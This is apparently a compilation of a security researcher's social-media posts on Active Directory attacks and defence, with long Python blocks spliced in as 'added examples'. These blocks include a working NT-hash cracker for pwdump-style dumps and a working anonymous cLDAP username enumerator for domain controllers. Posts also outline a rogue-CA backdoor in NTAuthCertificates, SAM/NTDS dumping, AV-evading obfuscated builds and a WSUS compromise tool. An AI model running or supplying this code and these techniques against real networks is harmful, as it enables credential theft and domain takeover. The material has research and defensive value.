This is why your NVidia driver download is 670MB: they silently fix a *ton* of problems in games, so customers are happy. It's the same in Windows - here's the system wide shim db from Windows 11 23H2 with workarounds for "After Dark 4.0" with flying toasters released in 1996.
Do you want to go from NTLM hash to plaintext password in an instant? I made a freely accessible service that contains 8.7B hashes, no sign up required, free to use.
Stuck on a network with no credentials? No worries, you can anonymously bruteforce Active Directory domain controllers for usernames over LDAP Pings (cLDAP) using my new tool - with parallelization I get 10K usernames/sec
Don't lose trust! "The trust relationship between this workstation and the primary domain failed." Has this ever happened to you? I'll show you how to fix it, and (more interestingly) how it works behind the scenes 1/🧵
Did you know that you can mass upgrade a lot of Windows 10/11 3rd party software with a free tool from Microsoft? It's like Linux's "apt" or "yum" ... Patching some of your vulnerable software is now free and easy, as I'll show you here 1/5
Unbelievably cool Active Directory lab for you (and me!) to play with. Has parent/child domains, ADCS, different servers, lots of misconfigurations etc. You provision it with Vagrant and Ansible. The Game of Thrones naming is a bonus!
When the Linux kernel is about to run out of entropy, it could just check the current licensing terms for Microsoft products, as they are always changing in a random way. Problem solved, next please!
The paper details how requests for random numbers never fail in Windows, which is something the Linux kernel developers have never been able to successfully implement. Hopefully they can use this paper for ideas. 🤞
LAPSUS is threatening to release 1TB of stolen data from NVIDIA, which is the equivalent of the last three driver updates I downloaded for my graphics card
Using WSUS to patch your Domain Controllers? :-) That makes your WSUS server .... Tier 0! Anyway, here's a tool to pwn every machine that pulls updates from WSUS.
Today I did some dorking on @shodanhq, looking for Active Directory controllers exposed directly on the internet. Results after searching for "ldap GSS-SPNEGO" yielded a whopping 52K servers. Mind blowing!
The Active Directory group "Account Operators" is a bastard, and should be kept empty. Why? Because it undermines your *entire* delegation structure in the AD. Here are the details, and it shows why you should stay clear of this group 1/n
The "Backup Operators" group in your Active Directory can remote in to your Domain Controllers, and extract the ntds.dit file holding your entire AD along with hashes of all accounts.
Here's the rundown on how you exploit this ...
You should definitely not download the maybe-abandonware After Dark 4.0 ISO from the internet and install it on your Windows 11 PC. On the other hand, if you *do*, it will really mess up the app usage metrics that your computer ships to Microsoft.
Have you ever wondered where the SIDs for isolated Windows service come from? S-1-5-80-..... they're not in the registry, and not on the disk ... that's because they're *calculated* based on the service name ...
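Here is the calculation spelled out, as an added example (not code from the original post): a virtual service account SID is S-1-5-80 followed by the SHA-1 of the upper-cased, UTF-16LE encoded service name, split into five little-endian 32-bit sub-authorities. Because it is a hash, the only way to go from SID back to a name is to try candidate service names, which the second function does. The service names in the usage block are ordinary Windows services picked for illustration.

```python
import hashlib
import struct

# Virtual service accounts (NT SERVICE\<name>) get their SID from the service name:
# S-1-5-80-<5 sub-authorities>, where the sub-authorities are the SHA-1 digest of the
# upper-cased, UTF-16LE encoded service name read as five little-endian uint32 values.
# (S-1-5-80-0 is the fixed, well-known "NT SERVICE\ALL SERVICES" and is not derived this way.)


def service_sid(service_name: str) -> str:
    """Compute the S-1-5-80-... SID that Windows assigns to NT SERVICE\<service_name>."""
    digest = hashlib.sha1(service_name.upper().encode("utf-16-le")).digest()  # 20 bytes
    subs = struct.unpack("<5I", digest)                                         # 5 x uint32 LE
    return "S-1-5-80-" + "-".join(str(s) for s in subs)


def match_service_sid(sid: str, candidate_names):
    """Reverse lookup: there is no table to consult, so hash each candidate name and compare."""
    for name in candidate_names:
        if service_sid(name) == sid:
            return name
    return None


if __name__ == "__main__":
    # Illustrative service names (assumed); run `sc.exe showsid <name>` on Windows to compare.
    for svc in ("TrustedInstaller", "wuauserv", "MSSQLSERVER"):
        print(f"NT SERVICE\\{svc:<18} {service_sid(svc)}")
```

The upper-casing matters: `sc.exe showsid trustedinstaller` and `sc.exe showsid TrustedInstaller` return the same SID, which this function reproduces.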
Do domain/DNS recon using Azure and the AADInternals PowerShell module against any organization that uses Azure ... this is Microsoft (you get a loooong list of domains)
Fellow Active Directory infosec researchers here in Denmark have figured out how to cross domains in the same direction as a trust - yes, the opposite of what is normal 1/🧵
So I'm diving head first into Azure AD, and I think it's a f*cking can of worms. Most large orgs do a TWO WAY sync of their on prem AD with AAD (users, groups, passwords). The attack surface is just horrible.
Deploy GOAD (the wonderful vulnerable Active Directory experimental lab from Orange Cyberdefense) - a quick guide. You'll need a spare PC with at least 4 cores, 16GB RAM and 256GB SSD. Script included, so it's easy even if you're not Linux savvy! 1/🧵
Your Azure AD Connect server ... it's a Tier 0 asset. Why? Because the Azure AD account it contains can probably compromise your entire tenant. If you use inbound password sync, the AD account it uses can potentially cost you your AD too. 1/7
SMB auditing: if you want to find/audit SMB shares there's SMBeagle as an option. It doesn't look at content, just exposed files, but is a nifty addition to the arsenal
Cool LDAP utility for Red Teamers! Easy to do simple lookups and some modifications - it has great potential and I'm sure more features will come. I had a similar tool planned, but never found the time to do it - fortunately @synzack21 did!
Do you have privileges? Sure you do, every Windows user has them. See them with "whoami /priv", and check out this GitHub repository for how to help yourself to even more rights (aka privesc!). It's a list of privileges and how to use them creatively.
You can now do a plaintext password lookup in the 8.7B password database. This is done by converting it to NT hash internally, then looking that up. Controversially the site stores that hash of any unmatched passwords, just like if you did a hash lookup.
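The "convert to NT hash, then look that hash up" step described above, as an added example that is not the site's code: an NT hash is MD4 over the UTF-16LE encoding of the password. MD4 is implemented inline because OpenSSL 3 only ships it as a legacy algorithm, so `hashlib.new("md4")` often fails. The same hash-and-compare loop is what a wordlist attack on an NTDS/SAM dump does, so the second function matches constructed pwdump-style lines against a small constructed wordlist; the usernames, RIDs and words are made up for the example.

```python
import struct

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), used because OpenSSL 3 treats MD4 as a legacy algorithm."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(data) * 8
    data = data + b"\x80"                                   # padding: 1 bit, then zeros
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)                      # 64-bit little-endian length
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]   # round 2 word order
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]   # round 3 word order
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):
            a = _rotl((a + F(b, c, d) + X[i]) & _MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + G(b, c, d) + X[r2[i]] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = ((a0 + a) & _MASK, (b0 + b) & _MASK,
                          (c0 + c) & _MASK, (d0 + d) & _MASK)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), lowercase hex as hashcat mode 1000 expects it."""
    return md4(password.encode("utf-16-le")).hex()


def crack_dump(dump_lines, wordlist):
    """Match pwdump-style lines (user:rid:lmhash:nthash:::) against a wordlist by NT hash.
    Hash the wordlist once, then look each dumped NT hash up: O(words + accounts)."""
    table = {nt_hash(w): w for w in wordlist}
    found = {}
    for line in dump_lines:
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, nt = parts[0], parts[3].lower()
        if nt in table:
            found[user] = table[nt]
    return found


# Constructed sample dump (not real data): alice uses "password", bob has an empty password.
SAMPLE_DUMP = [
    "alice:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "bob:1106:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "carol:1107:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
]
SAMPLE_WORDLIST = ["Summer2024", "password", ""]

if __name__ == "__main__":
    for user, pw in crack_dump(SAMPLE_DUMP, SAMPLE_WORDLIST).items():
        print(f"{user}: {pw!r}")
```

The empty-password NT hash (31d6cfe0...) showing up in a dump is worth a dedicated check on its own: it means an account with no password at all, not a weak one.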
FastSync is released!
It's my rsync alternative for Linux, because I needed to sync 100TB in several billion files that were also hardlinked together (and rsync was slow and kept failing)
Maybe useful for others ... maybe not. But here it is:
Then launch an elevated Windows Terminal, and get ready to patch some stuff. You simply type "winget upgrade" - this shows you all the stuff you have installed (not necessarily using winget - also manually!) which can be upgraded. 3/5
This is NOTEPAD.EXE on my Windows 11 machine that has SYSTEM.INI with comments about 16-bit support while it has multiple TABS open ... my mind is melting here. If you've ever configured the Novell Netware login on Windows 3.11 in the SYSTEM.INI file manually this is wild.
Microsoft Defender goes nuts over open source reverse proxy. Claims I'm under ransomware attack (active??). It's an executable on the D:\ drive, it's benign and it's not running. Sigh.
Not this **** again. AV blaming an open source tool for being a virus or malware. Sigh! It's a tunneling tool, so why not just flag SSH too? Fortunately this is written in Go, so I'll show you how to do an obfuscated build of it, which has almost no AV detections at all 1/🧵
WHAT!?!? More than 30 downloads PER DAY. I had no clue this was popular - based on GitHub stars it's not.
Spend 3 days making an attack tool: 9K downloads, spend 3 years making a defensive tool: 5K downloads.
No wonder everyone gets hacked.
@MalwareTechBlog
No, but I did successfully nuke Emotet from a large international company when 2 other companies failed, then deployed our EDR software and prevented a ransomware attack 9 months later. The thanks was they cancelled our software because it was too "noisy" in their alert mailbox.
Congrats, you're local admin. Now sync the password using PowerShell - provide an AD account that has the power to "Reset Password" on the machine account. That's it, problem solved! If you're in the mood for some history, read on ... 6/🧵
Further, now any companies that paid ransoms and didn’t do required disclosures are just going to get burned now.
Strong argument for future incidents, we have proof it does not work. And SEC is out for CISO blood…
If you're a sysadmin, you might consider adding this into an automated flow. If you're only pushing Microsoft updates at the moment, this is way better than nothing! You can also deploy software with winget ... and it's open source. What's not to like? 5/5
If you feel like Active Directory is daunting, but you want to learn more, and not feel like a total idiot at the same time ... read this: ... it wins because it's written concisely and in easy to consume language (from @Nutritionist_AP's feed, thanks 👏)
Visited a new customer the other day for a sales meeting. There were a couple of hours of waiting time, so I asked if it was OK to "look around their infrastructure?". It was, so I plugged in and enumerated 40% of their AD users in 3 minutes with my own tool.
(Re)introducing source -> target searches. Here I'm searching for accounts with passwords older than 5 years and asking adalanche if any of those have a path to one of the "Domain Admins" groups in this multi forest analysis. Code is on Github!
I know it's "just" a LEGO set, but for me it's a fond childhood memory of dreaming of going to space. I really loved building this one. Thanks
@LEGO_Group
for making stuff for us old kids.
A way to shoot yourself in the foot with Active Directory, is to forget to clean up exposed cPassword data in GPOs. Now adalanche detects this, and everyone that can access these passwords too. If you're doing pen tests or securing AD, this makes it very easy to find this.💪💪💪
Backdoor an AD: bring your own innocently named CA, place it in CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local - you can now always bring your own cert and be anyone. RT for reach, quote with a novel alternative.
Even if you aren't coding Go, here's a good explainer on tokens in Windows. I went through the same for the userspace service in our EDR product, service ran as high-priv and launched low priv interactive user tray bar when it detected a user logging in.
You can harden your Active Directory against wrong owners and permissions on Computer objects, which is a typical scenario with devastating results if it's a Domain Controller object. I've written about this problem earlier here. 1/11
Find DCs with wrong object owners using adalanche, and see the impact it's having to your security. If you're doing multi forest analysis, you can get really interesting results, as it will expose forest-to-forest takeover scenarios (names anonymized to protect the innocent) 1/5
Dump remote Windows hashes from SAM/SECURITY - this dumper overcomes SYSTEM only access by simply using admin rights to modify DACL, reading SAM and then restoring DACL - also supports NTLM relaying
Active Directory sysadmins: Run these extensive but easy to use tests on your infrastructure to show the most obvious problems. You'll get a goldmine of results back ranging from technical to security issues. Here's how you do it ... 1/5
Danish Identity Authority MitID (which is replacing the old NemID system here in Denmark) forgets to renew their SSL certificate. Minor mistake, but still my trust in them drops from "lukewarm" to "is the backend running with duct tape"🤦♂️
Highly underrated GitHub repo from @DebugPrivilege here - if you do lowlevel-ish coding or just want to learn about Windows internals, it's a real gold mine with knowledge that is reasonably easy to pick up. Can't believe it has so few stars.
New offensive security tool: Hash Muncher. It dumps incoming NTLM authentication hashes from SMB/file share access. It's based on ultra cool research from @Nettitude_Labs, great work!
Hacker strategy evolved: pwn a corp box, raise small alert that could be nothing. Wait for SOC employee to log into compromised box. Let them investigate and leave. Meanwhile steal their credentials, and then pwn everything because they have local admin on all boxes.
Audit your LAPS setup with adalanche: search for (_pwnable=ReadLAPSPassword). You'll probably get way too many targets, so limit it to a random subset with (_random100<5) which returns ~5% of the targets. This is an LDAP query, so wrap both in (&(query)(query)) as pictured.
Funny thing ... doing a website for hackers - yes, I'm looking at you who looked up this NTLM hash 634A8D63867B2E64855DED9537420986 on 🤣... so now we do proper escaping
If you have internet facing Windows machines, this is a good option to bring down attack surface a bit.
There is also the @Crowd_Security Windows agent which is an early alpha (for test systems!)
Or wait a bit for @UK_Daniel_Card to release his RDP guard.
Any Internet-facing Windows machines?
1. Go to
2. Pick your favorite evil country.
3. Select "IP Range" as format.
4. Copy the result to clipboard.
5. Run the script from
If you're running Windows 11, it's preloaded onto the system, so you can skip this part. On Windows 10, go to the Microsoft Store and search for "app installer". Here is my laptop which hasn't been powered on for quite a while - ironically it has a winget update available :-) 2/5
Oh, boy. The LDAP Ping. I thought I knew LDAP, and here's something I didn't know about. It's pseudo code, a fate worse than a bicycle accident. The rootDSE can be probed anonymously. Notice any problems? ;-)
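The LDAP ping in working form, as an added example for this post and for the cLDAP username bruteforcer mentioned earlier on the page (this is illustrative code, not ldapnomnom's): one UDP datagram to port 389 carrying a SearchRequest on the rootDSE for the Netlogon attribute with the filter (&(NtVer=\06\00\00\00)(AAC=\10\00\00\00)(User=<name>)), per MS-ADTS 6.3.3. No bind is needed. The reply's Netlogon blob starts with an opcode: 0x17 (LOGON_SAM_LOGON_RESPONSE_EX) if the account exists, 0x19 (LOGON_SAM_USER_UNKNOWN_EX) if it does not, which is the whole enumeration oracle. The BER encoder and decoder are hand-rolled so the block runs offline; `sample_response` builds a constructed reply for testing, and the DC address and username in the usage block are placeholders.

```python
import socket
import struct

# Opcodes in the Netlogon response blob (MS-ADTS 6.3.1.6)
LOGON_SAM_LOGON_RESPONSE_EX = 0x17   # account exists
LOGON_SAM_USER_UNKNOWN_EX = 0x19     # account does not exist


def _ber_len(n: int) -> bytes:
    """BER definite length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(payload)) + payload


def _eq(attr: str, value: bytes) -> bytes:
    """Filter equalityMatch [3]: SEQUENCE { attributeDesc, assertionValue }."""
    return _tlv(0xA3, _tlv(0x04, attr.encode()) + _tlv(0x04, value))


def build_ldap_ping(user: str, msgid: int = 1) -> bytes:
    """LDAPMessage { messageID, SearchRequest [APPLICATION 3] } for the LDAP ping user probe."""
    nt_ver = struct.pack("<I", 0x6)     # NETLOGON_NT_VERSION_5 | NETLOGON_NT_VERSION_5EX
    aac = struct.pack("<I", 0x10)       # ACB_NORMAL: ask about a normal user account
    filt = _tlv(0xA0, _eq("NtVer", nt_ver) + _eq("AAC", aac) + _eq("User", user.encode()))
    body = (
        _tlv(0x04, b"")                 # baseObject "" = rootDSE
        + _tlv(0x0A, b"\x00")           # scope: baseObject
        + _tlv(0x0A, b"\x00")           # derefAliases: neverDerefAliases
        + _tlv(0x02, b"\x00")           # sizeLimit 0
        + _tlv(0x02, b"\x00")           # timeLimit 0
        + _tlv(0x01, b"\x00")           # typesOnly FALSE
        + filt
        + _tlv(0x30, _tlv(0x04, b"Netlogon"))   # attributes: just Netlogon
    )
    return _tlv(0x30, _tlv(0x02, bytes([msgid])) + _tlv(0x63, body))


def _parse_tlv(buf: bytes, pos: int = 0):
    """Return (tag, value, position after this element)."""
    tag, ln = buf[pos], buf[pos + 1]
    pos += 2
    if ln & 0x80:                       # long-form length
        n = ln & 0x7F
        ln = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + ln], pos + ln


def netlogon_opcode(datagram: bytes):
    """Opcode (first little-endian uint16 of the Netlogon value) from a SearchResultEntry, else None."""
    _, msg, _ = _parse_tlv(datagram)
    _, _, pos = _parse_tlv(msg)              # messageID
    tag, entry, _ = _parse_tlv(msg, pos)     # protocolOp
    if tag != 0x64:                          # SearchResultEntry [APPLICATION 4]
        return None
    _, _, pos = _parse_tlv(entry)            # objectName
    _, attrs, _ = _parse_tlv(entry, pos)     # PartialAttributeList
    pos = 0
    while pos < len(attrs):
        _, attr, pos = _parse_tlv(attrs, pos)
        _, name, p = _parse_tlv(attr)
        _, vals, _ = _parse_tlv(attr, p)     # SET OF OCTET STRING
        if name.lower() == b"netlogon" and vals:
            _, blob, _ = _parse_tlv(vals)
            return struct.unpack_from("<H", blob)[0]
    return None


def user_exists(dc_ip: str, user: str, timeout: float = 2.0) -> bool:
    """Send one LDAP ping over UDP/389 and report whether the DC says the account exists."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_ldap_ping(user), (dc_ip, 389))
        data, _ = sock.recvfrom(4096)
    return netlogon_opcode(data) == LOGON_SAM_LOGON_RESPONSE_EX


def sample_response(opcode: int) -> bytes:
    """Constructed cLDAP reply (not a capture) carrying a Netlogon blob with the given opcode."""
    blob = struct.pack("<H", opcode) + b"\x00" * 14
    attr = _tlv(0x30, _tlv(0x04, b"Netlogon") + _tlv(0x31, _tlv(0x04, blob)))
    entry = _tlv(0x04, b"") + _tlv(0x30, attr)
    return _tlv(0x30, _tlv(0x02, b"\x01") + _tlv(0x64, entry))


if __name__ == "__main__":
    import sys
    dc, name = sys.argv[1], sys.argv[2]      # e.g. 10.0.0.1 administrator (assumed lab values)
    print(f"{name}: {'exists' if user_exists(dc, name) else 'unknown'}")
```

Because the probe is unauthenticated UDP, nothing in the DC's security log ties it to a user; detection has to come from the network side (a burst of cLDAP queries with changing User values from one source).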
If you're curious about how the backend for is holding up ... well, it's not exactly under pressure. If you spend your entire 1000 lookup quota in one go, you'll keep it busy for ~1 second
AzureAD lets users access resources based on the permissions they have. Unless they claim to be using Powershell, then you get some extra read-only permissions thrown in for free. Bonus: every application can claim to be Powershell by using its client ID ¯\_(ツ)_/¯
I will keep whining about the task manager being hosed in Windows 11 until someone from Microsoft fixes it. CPU usage @ 20% yet details show 96% idle. Current best option is asking @SwiftOnSecurity to help the mothership.
Yo, pentesters! What are the "Game Over" scenarios for an AD domain? Ran DCsync, issued certificate for other user, pwned a DC via GPO, reached user that is member of AD/DA/EA ... others? Trying to map out which nodes are the *final* goals of most attacks.
Of course you will not get everything upgraded on your system, but if you're like me you have a *lot* of freely available software on your system. Most of this will get upgraded ... now run "winget upgrade --all" if you feel confident nothing will break 4/5
Explore how hackers attack Active Directory by abusing common misconfigurations! I've made the Orange CyberDefense GOAD lab available as sample data for Adalanche, so you can visualize and look at real world attack paths in 5 minutes.
Android RCE+root via browser nets you $7,700 at TianfuCup.
The same exploit will get you up to $500,000 at Zerodium.
You'd have to have pretty high morals combined with your technical skills to not just sell your exploit quietly.
GPO vulnerability analysis is now working as intended in adalanche. Here's a great example, labels removed to protect the innocent, but I'll explain below what's going on here 1/n
@SwiftOnSecurity
Adalanche is my AD analysis tool. It shows graphs that visualize attack paths and other access methods in AD and Windows systems. It will take you less than 5 minutes to get results.
If your SCCM server controls your AD controllers -> SCCM servers are Tier 0 ... and if the SQL server storing the SCCM DB contains push credentials for Tier 0 -> that makes the SQL server Tier 0 as well.
Attack paths are so much fun, but hard to lock down.
Taking a look at SCCM on this lazy Sunday evening? Of course you are, what else is there to do?! One of the things that's likely to draw your interest are just how all those user accounts are stored. Check out the SC_UserAccount table in the SQL DB.
Active Directory is just a bottomless pit of opportunities for configuration mistakes. Hello there, Foreign-Security-Principal with full access to the keys to the kingdom by endless PKI abuse. Maybe this should be a predefined search somehow.
"It's all fun and games until someone loses a username". LDAP Nom Nom v1.0.7 high performance anonymous username bruteforcer for Active Directory - now with evasive maneuvers.
Hackers love IT documentation! It saves them so much time when doing the recon phase. They're often found in text files, Word documents, Outlook and Sharepoint. Leave false documentation lying around, pointing to internal honeypots or canary tokens.
New upgrade to the deploy-goad script I made for Ubuntu. If you don't know GOAD, it's an excellent vulnerable Active Directory lab from Orange Cyberdefense. Super easy to deploy a lab to test out detection, attacks and see some typical problems.
PassTester is a PowerShell based script that allows you to dump NTDS.DIT and scan for weak passwords using in order to immediately locate the most predictable passwords.
First some basics: when you join a computer to an Active Directory, it gets a machine account in the AD. This is like a user account, but with objectClass value 'computer' (and others) and some userAccountControl flags indicating it to be a computer (0x1000). But ... 2/🧵
To fix it, you need admin access to the machine. There are multiple ways to do this 1) local admin account 2) unrotated LAPS account (unlikely) or 3) cached domain account which is local admin. 4) break into machine with your fav ISO and pwn local administrator account. 5/🧵
What's your favorite hashcat rules and wordlists for attacking NTLM dumps?
I do get fairly good results, but it's always more or less random experimentation at the last percentages I'm able to squeeze out.
So to sum it up: locally stored machine password and AD password must match. Resyncing them is possible and easy, but must be done on both ends at the same time for it to work. 12/🧵END
@Eric0Lawton
@kcolbin
@JacquelynGill
I did one project, to fix a door security system written in Turbo Pascal in 1992. Not all code was available, and different parts of code on random disks. I spent at least 2 months on that in total. Doors wouldn't have unlocked 1/1/2000 if I hadn't. This is just a tiny example.